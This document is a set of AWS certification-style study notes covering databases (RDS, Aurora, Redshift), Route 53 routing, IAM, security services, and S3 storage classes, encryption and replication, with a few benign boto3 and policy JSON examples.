  • Easily embed analytics to differentiate your applications
  • Enable BI for everyone with QuickSight Q
  • Can get data insights in minutes from AWS services (e.g. Redshift, RDS, Athena, S3)
  • Can choose QuickSight to keep the data in SPICE up to date as the data in the underlying sources changes
  • SPICE:
    • Amazon QuickSight is built with SPICE - a Super-fast, Parallel, In-memory Calculation Engine
    • SPICE uses a combination of columnar storage, in-memory technologies enabled through the latest hardware innovations, and machine code generation to run interactive queries on large datasets and get rapid responses

Aurora Cheatsheet


  • When you need a fully managed Postgres- or MySQL-compatible database with scaling, automated backups, high availability, and fault tolerance, think Aurora
  • Aurora can run MySQL or Postgres database engines
  • Aurora MySQL is 5x faster than regular MySQL
  • Aurora Postgres is 3x faster than regular Postgres
  • Aurora is 1/10 the cost of its competitors with similar performance and availability options
  • Aurora replicates 6 copies for your database across 3 availability zones
  • Aurora is allowed up to 15 Aurora Replicas
  • An Aurora database can span multiple regions via Aurora Global Database
  • Aurora Serverless allows you to stop and start Aurora and scale automatically while keeping costs low
  • Aurora Serverless is ideal for new projects or projects with infrequent database usage

RDS

  • Relational Database Service
  • Database service for database engines that use SQL as a query language
  • Engines:
    • PostgreSQL
    • MySQL / MariaDB
    • Oracle
    • Microsoft SQL Server
    • IBM DB2
    • Aurora (Proprietary AWS Relational Database)
  • You cannot access the underlying compute instances for RDS unless you are using RDS Custom
    • RDS Custom supports Oracle and Microsoft SQL Server
  • RDS scales storage automatically
    • You have to set the Maximum Storage Threshold (max amount of storage to use)
    • Supports all RDS engines

Read Replicas

  • Scale out read operations
  • Create up to 15 read replicas within the same AZ, across AZs, or across regions
  • Replication is asynchronous
  • You can promote a read replica to its own database capable of full writes
  • Network Costs
    • If the read replica is in the same region, there is no cost for replication traffic
    • For cross-region replication traffic, there is a cost
  • You can setup read-replicas as Multi-AZ for fault tolerance

RDS Multi-AZ

  • Mainly used for disaster recovery
  • synchronous replication to a standby database
  • One DNS name for both databases with automatic failover
  • Multi-AZ replicas cannot be read or written to until they are promoted to the primary instance
  • Converting from single-AZ to multi-AZ requires no downtime. This can be done in the “modify” section of the RDS database
    • A snapshot is taken and restored into a new standby database. Then a full sync of the database is initiated.

RDS Proxy

  • Fully managed database proxy for RDS
  • Allows apps to pool and share DB connections established with the database
  • Improves database efficiency by reducing the stress on database resources (e.g. CPU, RAM) and minimizing open connections (and timeouts)
  • Serverless, autoscaling, highly available (multi-AZ)
  • Reduces RDS and Aurora failover time by up to 66%
  • Supports RDS (MySQL, PostgreSQL, MariaDB, MS SQL Server) and Aurora (MySQL, PostgreSQL)
  • No code changes required for most apps
  • Enforce IAM authentication for DB, and securely store credentials in AWS Secrets Manager
  • RDS proxy is never publicly accessible
  • RDS Proxy is useful for highly scaling lambda functions that open database connections

RDS Backups

  • Daily full backup of the database
  • Transaction logs are backed up every 5 minutes
  • 1 to 35 days of backup retention, set to 0 to disable

Aurora

  • Fully managed Postgres or MySQL compatible database designed by default to scale and fine-tuned to be really fast
  • Aurora automatically grows in increments of 10GB, up to 128 TB
  • 5x performance over MySQL, 3x performance over Postgres

Introduction to Aurora

  • Combines the speed and availability of high-end databases with the simplicity and cost-effectiveness of open source databases
  • Aurora can run either MySQL or Postgres compatible engines
  • Aurora MySQL offers 5x better performance than traditional MySQL
  • Aurora Postgres is 3x better performance than traditional Postgres
  • Aurora Costs more than RDS (20% more) but is more efficient

Aurora Availability

  • 6 copies of your data across 3 AZs:
    • Needs only 4 out of 6 copies for writes (so if one AZ is down then it is fine)
    • Need only 3 out of 6 for reads
    • self healing with peer-to-peer replication
    • Storage is striped across 100s of volumes
  • Automated failover for master happens in less than 30 seconds
  • Master + up to 15 Aurora Read Replicas serve reads. You can autoscale the read replicas. Clients connect to the “Reader Endpoint”, which will point to any of the read instances

Fault Tolerance and Durability

  • Aurora Backup and Failover is handled automatically

  • Aurora has a feature called Backtrack that allows you to restore to any point in time without restoring from backups

  • Snapshots of data can be shared with other AWS accounts

  • Storage is self-healing, in that data blocks and disks are continuously scanned for errors and repaired automatically

Aurora Replicas

| | Amazon Aurora Replicas | MySQL Read Replicas |
|---|---|---|
| Number of Replicas | Up to 15 | Up to 5 |
| Replication Type | Asynchronous (ms) | Asynchronous (s) |
| Performance impact on primary | Low | High |
| Act as failover target | Yes (no data loss) | Yes (potentially minutes of data loss) |
| Automated failover | Yes | No |
| Support for user-defined replication delay | No | Yes |
| Support for different data or schema vs primary | No | Yes |

Aurora Serverless

  • Aurora except the database will automatically start up, shut down, and scale capacity up or down based on your application’s needs
  • Good for apps used a few minutes several times per day or week, e.g. a low-volume blog site
  • pay for database storage and the database capacity and I/O your database consumes while it is active

Aurora Backups

  • 1 to 35 days retention
  • Cannot be disabled
  • Point in time recovery
  • Manual snapshots
    • Retain manually created snapshots for any amount of time

Aurora Database Cloning

  • Clone an existing Aurora database into a new database
  • Uses copy-on-write, so it’s very fast

Amazon Redshift


  • Fully managed, petabyte-scale data warehouse
  • Analyze massive amounts of data (run complex SQL queries) in a columnar-store database

What is a Data Warehouse?


  • A transaction is a unit of work performed within a database management system, e.g. reads and writes
| Database | Data warehouse |
|---|---|
| Online Transaction Processing (OLTP) | Online Analytical Processing (OLAP) |
| A database is built to store current transactions and enable fast access to specific transactions for ongoing business processes | A data warehouse is built to store large quantities of historical data and enable fast, complex queries across all the data |
| Adding items to your shopping list | Generating reports |
| Single source | Multiple sources |
| Short transactions (small and simple queries) with an emphasis on writes | Long transactions (long and complex queries) with an emphasis on reads |

Introduction to Redshift


  • AWS Redshift is the AWS managed, petabyte-scale solution for Data Warehousing
  • Pricing starts at just $0.25 per hour with no upfront costs or commitments.
  • Scale up to petabytes for $1,000 per terabyte, per year
  • Redshift's price is less than 1/10 the cost of most similar services
  • Redshift is used for Business Intelligence
  • Redshift uses OLAP (Online Analytical Processing)
  • Redshift is a columnar storage database
  • Columnar Storage for database tables is an important factor in optimizing analytic query performance because it drastically reduces the overall disk I/O requirements and reduces the amount of data you need to load from disk

Redshift Use Case


  • We want to continuously COPY data from

    1. EMR
    2. S3 and
    3. DynamoDB
    • to power a customer Business Intelligence tool
  • Using a third-party library we can connect and query Redshift for data.


Redshift Columnar Storage


  • Columnar Storage stores data together as columns instead of rows

  • OLAP applications look at multiple records at the same time. You save memory because you fetch just the columns of data you need instead of whole rows

  • Since data is stored by column, all values in a column have the same data type, allowing for easy compression


Redshift Configurations


  • Single Node
    • Nodes come in sizes of 160 GB. You can launch a single node to get started with Redshift
  • Multi-Node
    • You can launch a cluster of nodes with Multi Node mode
  • Leader Node
    • Manages client connections, receives queries, and coordinates query execution across the compute nodes

DNS

  • Domain Name System which translates the human friendly hostnames into the machine IP addresses.
  • www.google.com => 172.217.18.36
  • Each hosted zone costs $0.50/month
  • Public vs Private hosted zones

Records TTL


  • TTL - Time to live
  • High TTL - e.g. 24 hr
    • less traffic on Route 53
    • Possibly outdated records
  • Low TTL - e.g. 60s
    • More traffic on Route 53 ($$)
    • Records are outdated for less time
    • Easy to change records
  • Except for Alias records, TTL is mandatory for each DNS record

CNAME vs Alias


  • AWS resources (Load Balancer, CloudFront, ...) expose an AWS hostname:
    • e.g. lb-1234.us-east-2.elb.amazonaws.com, and you want myapp.mydomain.com
  • CNAME:
    • Points a hostname to any other hostname (app.domain.com => blabla.anything.com)
    • You cannot create a CNAME for the Apex record (root domain)
  • Alias:
    • Points a hostname to an AWS Resource (app.mydomain.com => blabla.amazonaws.com)
    • WORKS for ROOT DOMAIN and NON ROOT DOMAIN (aka, mydomain.com)
    • Free of charge
    • Native health check
    • Only supported for A and AAAA record types
    • Cannot set alias for an EC2 instance name

Routing Policies


  • Simple

    • Typically, the simple type of routing policy will resolve to a single resource
    • If the record resolves to multiple values, the client will choose a random one
    • When using the Alias record type, the record can only resolve to one resource
  • Weighted

    • Control the % of the requests that go to each specific resource.
    • Assign each record a relative weight
      • $\text{traffic (\%)} = \dfrac{\text{weight for a specific record}}{\text{sum of the weights for all records}}$
      • The sum of the weights of all records does not need to equal 100
    • DNS records must have the same name and type
    • Can be associated with Health Checks
    • Use cases: load balancing between regions, testing new application versions (see the boto3 sketch after this list)
  • Latency

    • Redirect to the resource that gives us the lowest latency
    • Super helpful when latency for users is a priority
    • Latency is based on traffic between users and AWS Regions
    • Germany users may be directed to the US (if that’s the lowest latency)
    • Can be associated with Health Checks (has a failover capability)
  • Failover

    • Active-passive failover: traffic is routed to a primary resource and fails over to a standby resource when the primary's health check reports unhealthy

  • Geolocation

    • Different from latency based
    • This routing is based on user location
    • Should create a “Default” record (in case there’s no match on location)
    • Use cases: website localization, restrict content distribution, load balancing
    • Can be associated with Health Checks
  • Geoproximity

    • Route traffic to your resources based on the location of users and resources
    • Ability to shift more traffic to resources based on the defined bias
    • To change the size of the geographic region, specify bias values:
      • To expand (1 to 99) - more traffic to the resource
      • To shrink (-1 to -99) - less traffic to the resource
    • Resources can be:
      • AWS resources (specify AWS region)
      • Non-AWS resources (specify Latitude and Longitude)
    • You must use Route 53 Traffic Flow to use this feature
  • Health Checks

    • HTTP Health Checks only work for public resources. For private resources, create a CloudWatch Metric and associate a CloudWatch Alarm, then create a Health Check that monitors the alarm
    • 15 global health checkers
    • Health checks methods:
      • Monitor an endpoint
        • Healthy/unhealthy threshold - 3 (default)
        • Interval 30 seconds
        • Supports HTTP, HTTPS, and TCP
        • if > 18% of health checkers report the endpoint is healthy, Route53 considers it healthy.
        • You can choose which locations you want Route53 to use
        • You must configure the firewall to allow traffic from the health checkers
      • Calculated Health Checks
        • Combine the results of multiple health checks into a single health check
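As a sketch of the Weighted policy above (not from the original notes; the hosted zone ID, record name, and IPs are placeholders), a boto3 example that splits traffic roughly 70/30 between two record sets:

    import boto3

    route53 = boto3.client("route53")

    for identifier, weight, ip in [("blue", 70, "203.0.113.10"), ("green", 30, "203.0.113.20")]:
        route53.change_resource_record_sets(
            HostedZoneId="Z1234567890ABC",
            ChangeBatch={
                "Changes": [{
                    "Action": "UPSERT",
                    "ResourceRecordSet": {
                        "Name": "app.mydomain.com",
                        "Type": "A",
                        "SetIdentifier": identifier,  # must be unique per weighted record
                        "Weight": weight,             # traffic share = weight / sum of weights
                        "TTL": 60,
                        "ResourceRecords": [{"Value": ip}],
                    },
                }]
            },
        )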

Configuring Amazon Route 53 to route traffic to an S3 Bucket


  • An S3 bucket that is configured to host a static website
    • You can route traffic for a domain and its subdomains, such as example.com and www.example.com to a single bucket.
    • Choose the bucket that has the same name that you specified for Record name
    • The name of the bucket is the same as the name of the record that you are creating
    • The bucket is configured as a website endpoint

IAM

Groups

  • Groups can only contain users, not other groups

User Permissions

  • Permission Boundaries can be set for a user account. They control the maximum permissions for the user. This can be helpful to delegate permission management to other users.
  • Permissions can be defined on a user account using a built-in policy or by adding the user to a group with defined permissions
  • You can create an access key for a user that can be used to access AWS APIs via the CLI, an Application, third party service, etc.
  • Permission policies are defined in JSON documents known as IAM policies:
      {
          "Version": "2012-10-17",
          "Statement": [
              {
                  "Action": "ec2:*",
                  "Resource": "*",
                  "Effect": "Allow",
                  "Condition": {
                      "StringEquals": {
                          "ec2:Region": "us-east-2"
                      }
                  }
              }
          ]
      }
    
  • Modifying custom IAM policies creates a new version of that policy

Password Policy

  • You can define a password policy in IAM
  • Typical password policy settings

MFA

  • MFA Device Options
    • Virtual MFA Device
      • Google Authenticator
      • Authy
    • Universal 2nd Factor (U2F) Security Key
      • Yubikey
    • Hardware Key Fob
      • Provided By Gemalto (3rd party)
    • Hardware Device for AWS GovCloud
      • Provided by SurePassID

Roles

  • Used to provide access to AWS services
  • For example, provide an EC2 instance access to an S3 bucket

Security Tools in IAM

  • Credential Report: generates a CSV file that contains details about user accounts
  • Access Advisor: accessible from an individual user in IAM; shows which AWS services the user has access to and when they were last accessed

AWS Certificate Manager

  • Integration with API Gateway
    • Create a custom domain name in API Gateway
    • For edge-optimized API Gateways, the TLS certificate must be in the same region as CloudFront (us-east-1)
    • For regional API Gateways, the TLS certificate must be imported in the same region as the API Gateway

AWS WAF (Web Application Firewall)

  • Protection at Layer 7 of the OSI Model
  • Can be deployed on ALB, CloudFront, API Gateway, AppSync GraphQL API, Cognito User Pool
  • After deploying the firewall, you create a Web ACL rule:
    • Filter based on IP address, HTTP Headers, HTTP body, URI strings, Message Size, geo-match, and rate-based rules
    • Web ACLs are regional, except on CloudFront where they are global
  • How can we get a fixed IP while using WAF with ALB? Use a Global Accelerator in front of the ALB. The Global Accelerator will provide the static IP address, since an ALB cannot have a static IP.

AWS Shield

  • Protect from DDoS attacks
  • Standard and Advanced SKUs
    • Standard is free and included/enabled on all VPCs
    • Advanced is $3,000/month per organization. Protection from more sophisticated DDoS attacks on EC2, ELB, CloudFront, Global Accelerator, and Route 53. Advanced also includes 24/7 access to the DDoS Response Team. Shield Advanced will automatically create WAF rules for you.

AWS Firewall Manager

  • Manage rules for multiple firewalls in an AWS organization
  • Can be used with WAF
  • Policies are created at the regional level
  • Rules are automatically applied to new resources as they are created

GuardDuty

  • Uses ML to protect your AWS account
  • Uses CloudTrail Event Logs, VPC Flow Logs, and DNS Logs. Optionally: EKS audit logs, RDS and Aurora logs, EBS, Lambda, and S3 data events
  • Can set up EventBridge rules to be notified in case of findings
  • Can protect against cryptocurrency mining attacks

Inspector

  • Automated security assessments on EC2 instances. Use AWS SSM Agent to scan the instance
  • Automated scans of container images pushed to ECR for CVEs
  • Lambda Functions can be scanned for vulnerabilities in code and package dependencies
  • Report findings in Security Hub or send findings via EventBridge

Macie

  • Uses ML and pattern matching to discover and protect sensitive data stored in S3
  • Notify you through EventBridge when PII is found

Storage-cheatsheet

  • Simple Storage Service (S3) Object-based storage. Store unlimited amount of data without worry of underlying storage infrastructure
  • S3 replicates data across at least 3 AZs to ensure 99.99% Availability and 11’9s of durability
  • Objects contain data (they’re like files)
    • Objects can be size anywhere from 0 Bytes up to 5 Terabytes
  • Buckets contain objects. Buckets can also contain folders which can in turn can contain objects
  • Bucket names are unique across all AWS accounts. Like a domain name
  • When you upload a file to S3 successfully you’ll receive an HTTP 200 code
  • Lifecycle Management: objects can be moved between storage classes or deleted automatically based on a schedule
  • Versioning: objects are given a Version ID. When new objects are uploaded the old objects are kept, and you can access any object version. When you delete an object, a delete marker is added and the previous versions are retained. Once versioning is turned on it cannot be turned off, only suspended.
  • MFA DELETE: enforces DELETE operations to require an MFA token in order to delete an object. Versioning must be turned on to use it. MFA delete can only be turned on from the AWS CLI. Only the root account is allowed to delete objects.
  • All new buckets are private by default. Logging can be turned on for a bucket to track operations performed on objects
  • Access Control is configured using Bucket Policies and Access Control Lists (ACL)
  • Bucket Policies are JSON documents which let you write complex access control
  • ACLs are the legacy method (not deprecated) where you grant access to objects and buckets with simple actions
  • Security in Transit Uploading is done over SSL
  • SSE stands for Server Side Encryption , S3 has 3 options for SSE
  • SSE-AES S3 handles the key, uses AES-256 algorithm
  • SSE-KMS Envelope encryption via AWS KMS and you manage the keys
  • SSE-C Customer provided key (you manage the key)
  • Client Side Encryption You must encrypt your own files before uploading them to S3
  • Cross Region Replication (CRR) allows you to replicate files across regions for greater durability. You must have versioning turned on in the source and destination buckets. You can have CRR replicate to a bucket in another AWS account
  • Transfer Acceleration provides faster and secure uploads from anywhere in the world. Data is uploaded via a distinct URL to an Edge location. Data is then transported to your S3 bucket via the AWS backbone network.
  • Presigned URLs are URLs generated via the AWS CLI or SDK. They provide temporary access to write or download object data. Presigned URLs are commonly used to access private objects.
  • S3 has 6 different storage classes
    • Standard Fast 99.99% Availability, 11 9’s Durability. Replicated across at least three AZs
    • Intelligent Tiering Uses ML to analyze your object usage and determine the appropriate storage class. Data is moved to the most cost-effective access tier, without any performance impact or added overhead.
    • Standard Infrequently Accessed (IA): still fast! Cheaper if you access files less than once a month. An additional retrieval fee is applied. 50% less than Standard (reduced availability)
    • One Zone IA: still fast! Objects only exist in one AZ. Availability is 99.5%, but 20% cheaper than Standard-IA (reduced durability); data could be lost if the AZ is destroyed. A retrieval fee is applied.
    • Glacier: for long-term cold storage. Retrieval of data can take minutes to hours, but the trade-off is very cheap storage
    • Glacier Deep Archive The lowest cost storage class. Data retrieval time is 12 hours

Introduction to S3


  • What is Object Storage (Object-based storage)?
  • A data storage architecture that manages data as objects, as opposed to other storage architectures:
    • file systems, which manage data as files in a file hierarchy
    • block storage, which manages data as blocks within sectors and tracks
  • S3 provides unlimited storage
  • You need not think about the underlying infrastructure
  • The S3 console provides an interface for you to upload and access your data
  • Individual objects can be anywhere from 0 bytes to 5 terabytes in size
  • Files larger than 5 GB must be uploaded using multi-part upload. It’s recommended to use multi-part upload for files larger than 100 MB
  • Baseline Performance
    • 3,500 PUT/COPY/POST/DELETE or 5,500 GET/HEAD requests per second per prefix in a bucket
    • There are no limits to the number of prefixes in a bucket
    • Example of a prefix
      • bucket/folder1/subfolder1/mypic.jpg => prefix is /folder1/subfolder1/
  • S3 Select
    • Use SQL like language to only retrieve the data you need from S3 using server-side filtering
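For example, a minimal boto3 sketch of S3 Select filtering a CSV object server-side (the bucket, key, and query are hypothetical):

    import boto3

    s3 = boto3.client("s3")

    resp = s3.select_object_content(
        Bucket="my-bucket",
        Key="data/sales.csv",
        ExpressionType="SQL",
        Expression="SELECT s.region, s.amount FROM S3Object s WHERE CAST(s.amount AS FLOAT) > 100",
        InputSerialization={"CSV": {"FileHeaderInfo": "USE"}},
        OutputSerialization={"CSV": {}},
    )

    # The response is an event stream; only the filtered rows are transferred
    for event in resp["Payload"]:
        if "Records" in event:
            print(event["Records"]["Payload"].decode())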
| S3 Object | S3 Bucket |
|---|---|
| Objects contain data (they are like files) | Buckets hold objects |
| An object may consist of: Key (the name of the object), Value (the data itself, a sequence of bytes), Version ID (the version of the object, when versioning is enabled), Metadata (additional information attached to the object) | Buckets can have folders, which can in turn hold objects |
| | S3 is a universal namespace, so bucket names must be unique (like having a domain name) |

S3 Storage Classes


  • AWS offers a range of S3 storage classes that trade retrieval time, accessibility, and durability for cheaper storage

(Descending from most to least expensive)

  • S3 Standard (default)

    • Fast! 99.99 % Availability,
    • 11 9’s Durability. If you store 10,000,000 objects on S3, you can expect to lose a single object once every 10,000 years
    • Replicated across at least three AZs
      • S3 standard can sustain 2 concurrent facility failures
  • S3 Intelligent Tiering

    • Uses ML to analyze object usage and determine the appropriate storage class
    • Data is moved to most cost-effective tier without any performance impact or added overhead
  • S3 Standard-IA (Infrequent Access)

    • Still Fast! Cheaper if you access files less than once a month
    • Additional retrieval fee is applied. 50% less than standard (reduced availability)
    • 99.9% Availability
  • S3 One-Zone-IA

    • Still fast! Objects only exist in one AZ.
    • Availability is 99.5%, but 20% cheaper than Standard-IA
    • Reduced durability
    • Data could be lost if the AZ is destroyed
    • Retrieval fee is applied
  • S3 Glacier Instant Retrieval

    • Millisecond retrieval, great for data accessed once a quarter
    • Minimum storage duration of 90 days
  • S3 Glacier Flexible Retrieval

    • data retrieval: Expedited (1 to 5 minutes), Standard (3 to 5 hours), Bulk (5 to 12 hours) - free
    • minimum storage duration is 90 days
    • Retrieval of data can take minutes to hours, but the trade-off is very cheap storage
  • S3 Glacier Deep Archive

    • The lowest cost storage class - Data retrieval time is 12 hours
    • standard (12 hours), bulk (48 hours)
    • Minimum storage duration is 180 days
  • S3 Glacier Intelligent Tiering


Storage class comparison


  • S3 Guarantees:
    • Platform is built for 99.99% availability
    • Amazon guarantees 99.99% availability
    • Amazon guarantees 11’9s of durability

S3 Security


  • All new buckets are PRIVATE when created by default

  • Logging per request can be turned on for a bucket

  • Log files are generated and saved in a different bucket (can be stored in a bucket from different AWS account if desired)

  • Access control is configured using Bucket Policies and Access Control Lists (ACL)

  • User-Based Security

    • IAM Policies
    • An IAM principal can access an S3 object if its IAM permissions allow it OR the resource policy allows it, AND there is no explicit deny
  • Resource-Based Security

    • Bucket Policies - Bucket wide rules from the S3 console

      • JSON based policy

          {
              "Version": "2012-10-17",
              "Statement": [{
                  "Sid": "AllowGetObject",
                  "Principal": {
                      "AWS": "*"
                  },
                  "Effect": "Allow",
                  "Action": "s3:GetObject",
                  "Resource": "arn:aws:s3:::DOC-EXAMPLE-BUCKET/*",
                  "Condition": {
                      "StringEquals": {
                          "aws:PrincipalOrgID": ["o-aa111bb222"]
                      }
                  }
              }]
          }
        
      • You can use the AWS Policy Generator to create JSON policies

    • Object ACL - finer grained

    • Bucket ACL - Less common


S3 Static Website Hosting

  • You must enable public reads on the bucket

S3 Encryption

  • 4 types of encryption in S3

    • Server side encryption with managed keys (SSE-S3)

      • Key is completely managed by AWS, you never see it
      • Object is encrypted server-side
      • Enabled by default
        • Uses AES-256, must set header "x-amz-server-side-encryption": "AES256"
    • Server side encryption with KMS keys stored in AWS KMS (SSE-KMS)

      • Manage the key yourself, store the key in KMS
      • You can audit the key use in CloudTrail
        • Objects are encrypted with AES-256; must set header "x-amz-server-side-encryption": "aws:kms" (see the boto3 sketch after this list)
      • Accessing the key counts toward your KMS Requests quota (5500, 10000, 30000 rps, based on region)
        • You can request a quota increase from AWS
    • Server Side Encryption with customer provided keys (SSE-C)

      • Can only be enabled/disabled from the AWS CLI
      • AWS doesn’t store the encryption key you provide
      • The key must be passed as part of the headers with every request you make
      • HTTPS must be used
    • CSE (Client side encryption)

      • Clients encrypt/decrypt all the data before sending any data to S3
      • The customer fully manages the keys and the encryption lifecycle
  • Encryption in Transit

    • Traffic between local host and S3 is achieved via SSL/TLS
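A minimal boto3 sketch of an SSE-KMS upload, assuming a placeholder bucket and KMS key ARN (boto3 sets the x-amz-server-side-encryption header for you):

    import boto3

    s3 = boto3.client("s3")

    s3.put_object(
        Bucket="my-bucket",
        Key="reports/2024-01.csv",
        Body=b"col1,col2\n1,2\n",
        ServerSideEncryption="aws:kms",   # SSE-S3 (the default) would be "AES256"
        SSEKMSKeyId="arn:aws:kms:us-east-1:123456789012:key/1111-2222-3333",  # placeholder key ARN
    )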

S3 Objects

S3 Data Consistency

| New Objects (PUTs) | Overwrites (PUTs) or Deletes (DELETEs) |
|---|---|
| Read-after-write consistency | Eventual consistency |
| When you upload a new S3 object, you are able to read it immediately after writing | When you overwrite or delete an object, it takes time for S3 to replicate versions across AZs; if you read immediately, S3 may return an old copy, so you generally need to wait a few seconds before reading |

(Note: since December 2020, S3 delivers strong read-after-write consistency for all PUT and DELETE operations, so the eventual-consistency caveat above only applies to the older model.)

S3 Cross-Region Replication or Same-Region Replication

  • When enabled, any object that is uploaded will be automatically replicated from the source bucket to the destination bucket (another region for CRR, the same region for SRR)

  • Must have versioning turned on in both the source and destination buckets.

  • Can have CRR replicate to another AWS account

  • Replicate objects within the same region

  • You must give proper IAM permissions to S3

  • Buckets can be in different AWS accounts

  • Only new objects are replicated after enabling replication. To replicate existing objects, you must use S3 Batch Replication

  • For DELETE operations, you can optionally replicate delete markers. Delete Markers are not replicated by default.

  • To replicate, you create a replication rule in the “Management” tab of the S3 bucket. You can choose to replicate all objects in the bucket, or create a rule scope

S3 Versioning

  • Allows you to version your objects

  • Stores all versions of an object in S3

  • Once enabled it cannot be disabled, only suspended on the bucket

  • Fully integrates with S3 Lifecycle rules

  • MFA Delete feature provides extra protection against deletion of your data

Lifecycle Management

  • Lifecycle Rule Actions

    • Move current objects between storage classes
    • Move noncurrent versions of objects between storage classes
    • Expire current versions of objects
    • Permanently delete noncurrent versions of objects
    • Delete Expired object delete markers or incomplete multi-part uploads
  • Automates the process of moving objects to different storage classes or deleting objects altogether

  • Can be used together with Versioning

  • Can be applied to both Current and previous versions
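A minimal boto3 sketch of such a lifecycle rule (bucket name, prefix, and day counts are made up): move objects under logs/ to Standard-IA after 30 days, to Glacier after 90, and expire them after a year.

    import boto3

    s3 = boto3.client("s3")

    s3.put_bucket_lifecycle_configuration(
        Bucket="my-bucket",
        LifecycleConfiguration={
            "Rules": [{
                "ID": "archive-logs",
                "Status": "Enabled",
                "Filter": {"Prefix": "logs/"},
                "Transitions": [
                    {"Days": 30, "StorageClass": "STANDARD_IA"},
                    {"Days": 90, "StorageClass": "GLACIER"},
                ],
                "Expiration": {"Days": 365},
            }]
        },
    )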

S3 Transfer Acceleration

  • Fast and secure transfer of files over long distances between your end users and an S3 bucket

  • Utilizes CloudFront’s distributed Edge locations

  • Instead of uploading to your bucket, users use a distinct URL for an Edge location

  • As data arrives at the Edge location it is automatically routed to S3 over a specially optimized network path. (Amazon’s backbone network)

  • Transfer acceleration is fully compatible with multi-part upload

Presigned URLs

  • Generates a URL which provides temporary access to an object to either upload or download object data.

  • The presigned URL inherits the permissions of the user that created it

  • Presigned URLs are commonly used to provide access to private objects

  • Can use the AWS CLI or AWS SDK to generate presigned URLs

  • Example: a web application needs to allow users to download files from a password-protected part of the app. The web app generates a presigned URL which expires after 5 seconds, and the user downloads the file with it (see the sketch below).
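A minimal boto3 sketch of generating a presigned download URL (the bucket, key, and 300-second expiry are placeholders); the URL carries the permissions of the credentials that signed it.

    import boto3

    s3 = boto3.client("s3")

    url = s3.generate_presigned_url(
        ClientMethod="get_object",
        Params={"Bucket": "my-bucket", "Key": "private/report.pdf"},
        ExpiresIn=300,  # seconds; the link stops working after this
    )
    print(url)  # hand this URL to the user for a temporary download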

MFA Delete

  • MFA Delete ensures users cannot delete objects from a bucket unless they provide their MFA code.

  • MFA delete can only be enabled under these conditions

    1. The AWS CLI must be used to turn on MFA
    2. The bucket must have versioning turned on
  • Only the bucket owner, logged in as the root user, can DELETE objects from the bucket

AWS Snow Family

  • The AWS Snow Family are storage and compute devices used to physically move data in or out of the cloud when moving it over the internet or a private connection is too slow, difficult, or costly
  • Data Migration: Snowcone, Snowball Edge (Storage Optimized), Snowmobile
  • Edge computing: Snowcone, Snowball Edge (Compute Optimized)
  • Snowcone
    • Small, weighs 4 pounds
    • Rugged
    • Must provide your own battery and cables
    • Snowcone 8TB
    • Snowcone 14TB SSD

Snow family

Storage Services

  • Simple Storage Service (S3)

    • A serverless object storage service
    • Can upload very large files and an unlimited number of files
    • you pay for what you store
    • Need not worry about the underlying file-system or upgrading the disk size
  • S3 Glacier

    • Cold storage service
    • low cost storage solution for archiving and long-term backup
    • Uses previous generation HDD drives to get that low cost
    • highly secure and durable
  • Elastic Block Store (EBS)

    • a persistent block storage service
    • virtual hard drive in the cloud to attach to EC2 instances
    • Can choose different kinds of storage: SSD, Provisioned IOPS SSD, Throughput Optimized HDD, Cold HDD
  • Elastic File Storage (EFS)

    • a cloud-native NFS file system service
    • File storage you can mount to multiple Ec2 instances at the same time
    • When you need to share files between multiple EC2 instances
  • Storage Gateway

    • a hybrid cloud storage service that extends your on-premise storage to cloud
      • File Gateway : extends your local storage to AWS S3
      • Volume Gateway : caches your local drives to S3 so you have continuous backup of files on cloud
      • Tape Gateway : stores files on virtual tapes for very cost effective and long term storage
  • AWS Snow Family

    • Storage devices used to physically migrate large amounts of data
    • Snowball and Snowball Edge {Snowball does not exist anymore}: briefcase-sized data storage devices, 50-80 terabytes
    • Snowmobile: a cargo container filled with racks of storage and compute, transported via semi-trailer truck to transfer up to 100 PB of data per trailer
    • Snowcone very small version of snowball that can transfer 8TB of data
  • AWS Backup

    • a fully managed backup service
    • Centralize and automate the backup of data across multiple AWS services
    • eg. EC2, EBS, RDS, DynamoDB, EFS, Storage Gateway
    • can create backup plans
  • Cloud Endure Disaster Recovery

    • Continuously replicates your machines into a low-cost staging area in your target AWS account and preferred region, enabling fast and reliable recovery if one of the data centers fails
  • Amazon FSx

  • Launch 3rd party high performance file systems on AWS

  • Fully managed service

  • Supports Lustre, OpenZFS, NetApp ONTAP, and Windows File Server (SMB)

  • Data is backed up daily

  • Windows FSx can be mounted on Linux Servers

  • Lustre is derived from Linux and Cluster and used for high-performance computing

  • FSx can be used for on-prem servers using Direct Connect or VPN

  • FSx for Lustre deployment options:

    • Scratch file system
      • Temporary storage, data is not replicated, high performance
    • Persistent File System
      • Long term storage, data is replicated within same AZ (files replaced within minutes upon failure)
  • FSx for NetApp ONTAP is compatible with NFS, SMB, iSCSI. Supports point-in-time instantaneous cloning

  • Amazon Athena

    • A serverless, interactive analytics service built on open-source frameworks, supporting open-table and file formats.
    • Athena provides a simplified, flexible way to analyze petabytes of data where it lives
    • Analyze data or build applications from an S3 data lake and 30 data sources, including on-premises data sources or other cloud systems using SQL or Python

Storage Gateway

  • Bridge between on-prem and S3 storage

  • Can run as a virtual or hardware appliance on-prem

  • Use Cases:

    1. disaster recovery
    2. backup and restore/cloud migration
    3. tiered storage
    4. on-premises cache and low-latency file access
  • S3 File Gateway

    • S3 buckets are accessible using the NFS and SMB protocol
    • Most recently used data is cached in the file gateway
    • Supports S3 Standard, S3 Standard-IA, S3 One Zone-IA, S3 Intelligent-Tiering
    • Transition to S3 Glacier using a Lifecycle Policy
  • FSx File Gateway

    • Native access to Amazon FSx for Windows File Server
    • Useful for caching frequently accessed data on your local network
    • Windows native compatibility
  • Volume Gateway

    • Block storage using iSCSI backed by S3
    • Point in time backups
    • Gives you the ability to restore on-prem volumes
  • Tape Gateway

    • Same as Volume Gateway, but for tapes

Amazon FSx vs EFS

| EFS | FSx |
|---|---|
| EFS is a managed NAS filer for EC2 instances based on Network File System (NFS) version 4 | FSx is a managed Windows Server that runs Server Message Block (SMB)-based file systems |
| File systems are distributed across availability zones (AZs) to eliminate I/O bottlenecks and improve data durability | Built for high performance and sub-millisecond latency using solid-state drive storage volumes |
| Better for Linux systems | Applications: web servers and content management systems built on Windows and deeply integrated with the Windows Server ecosystem |

S3 Object Lock

  • With S3 Object Lock, you can store objects using write-once-read-many (WORM) mode.

  • Object Lock can prevent objects from being deleted or overwritten for a fixed amount of time or indefinitely

    Governance mode

    • Users can’t overwrite or delete an object version or alter its lock settings unless they have special permissions.
    • Protect objects against being deleted by most users, but you can still grant some users permission to alter the retention settings or delete the object if necessary.
    • Used to test retention-period settings before creating a compliance- mode retention period
